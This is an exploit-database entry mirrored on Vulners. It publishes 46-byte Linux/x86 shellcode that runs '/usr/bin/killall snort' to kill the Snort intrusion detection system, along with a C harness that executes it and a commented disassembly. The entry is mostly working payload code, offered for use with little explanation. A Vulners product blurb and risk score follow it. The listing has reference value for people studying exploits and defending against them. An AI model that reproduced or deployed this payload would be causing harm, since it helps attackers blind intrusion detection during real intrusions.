Lucene search
K

Linux/x86 - /usr/bin/killall snort Shellcode (46 bytes)

🗓️ 01 Jan 2009 00:00:00Reported by Exploit-DBType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 52 Views

/usr/bin/killall snort shellcode for Linux/x86 (46 bytes

Code
Name = John Babio
Twitter = 3vi1john

/usr/bin/killall snort

const char sc[] = "\x31\xc0\x50\x6a\x74\x68\x73\x6e\x6f\x72\x89\xe6\x50\x68\x6c\x61\x6c\x6c\x68\x2f\x6b"
"\x69\x6c\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\x50\x56\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
main(){
      int (*shell)();
      shell=sc;
      shell();
    }

8048060 <_start>:
 8048060:       31 c0                   xor    %eax,%eax
 8048062:       50                      push   %eax
 8048063:       6a 74                   push   $0x74
 8048065:       68 73 6e 6f 72          push   $0x726f6e73
 804806a:       89 e6                   mov    %esp,%esi
 804806c:       50                      push   %eax
 804806d:       68 6c 61 6c 6c          push   $0x6c6c616c
 8048072:       68 2f 6b 69 6c          push   $0x6c696b2f
 8048077:       68 2f 62 69 6e          push   $0x6e69622f
 804807c:       68 2f 75 73 72          push   $0x7273752f
 8048081:       89 e3                   mov    %esp,%ebx
 8048083:       50                      push   %eax
 8048084:       56                      push   %esi
 8048085:       53                      push   %ebx
 8048086:       89 e1                   mov    %esp,%ecx
 8048088:       31 d2                   xor    %edx,%edx
 804808a:       b0 0b                   mov    $0xb,%al
 804808c:       cd 80                   int    $0x80

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jan 2009 00:00Current
7.1High risk
Vulners AI Score7.1
52